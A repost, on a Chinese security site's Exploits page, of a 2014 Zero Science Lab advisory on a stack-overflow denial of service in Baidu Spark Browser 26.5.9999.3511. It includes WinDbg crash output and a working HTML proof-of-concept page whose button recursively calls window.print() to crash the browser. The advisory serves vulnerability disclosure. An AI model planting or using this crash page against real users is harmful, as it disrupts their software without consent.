首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Baidu Spark Browser 26.5.9999.3511 Stack Overflow
来源:zeroscience.mk 作者:LiquidWorm 发布时间:2014-07-01  
<!--

Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow Vulnerability (DoS)


Vendor: Baidu, Inc.
Product web page: http://www.baidu.com
Affected version: 26.5.9999.3511

Summary: Spark Browser is a free Internet browser with very
sharp UIs and cool utilities. It's based on the Chromium
technology platform, giving it fast browsing capabilities.

Desc: Spark Browser version 26.5.9999.3511 allows remote
attackers to cause a denial of service (application crash)
resulting in stack overflow via nested calls to the window.print
javascript function.

-----------------------------------------------------------------

(153c.14f4): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000000b0 ebx=003d0000 ecx=003d0000 edx=5000016b esi=00000000 edi=0000010c
eip=77e0decf esp=03d23000 ebp=03d230c4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
ntdll!memcpy+0xbb8f:
77e0decf 56              push    esi

-----------------------------------------------------------------

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5190
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5190.php


28.06.2014

-->


<html>
<title>Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</title>
<body bgcolor="#50708C">
<center>
<p><font color="#e3e3e3">Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</font></p>
<button onClick=crash()>Execute!</button>
</center>
<script>
function crash(){
	window.print();
	crash();
}
</script>
</body>
</html>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Horde Framework Unserialize PH
·Nagios check_dhcp 2.0.2 Race C
·Internet Explorer 8 - Fixed Co
·Sun/Oracle GlassFish Authentic
·Wordpress MailPoet (wysija-new
·MongoDB NoSQL Collection Enume
·Core FTP LE 2.2 - Heap Overflo
·OpenSSL DTLS Fragment Buffer O
·Gitlist Unauthenticated Remote
·Supermicro Onboard IPMI Port 4
·Oracle Event Processing FileUp
·Gitlist <= 0.4.0 - Remote Code
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved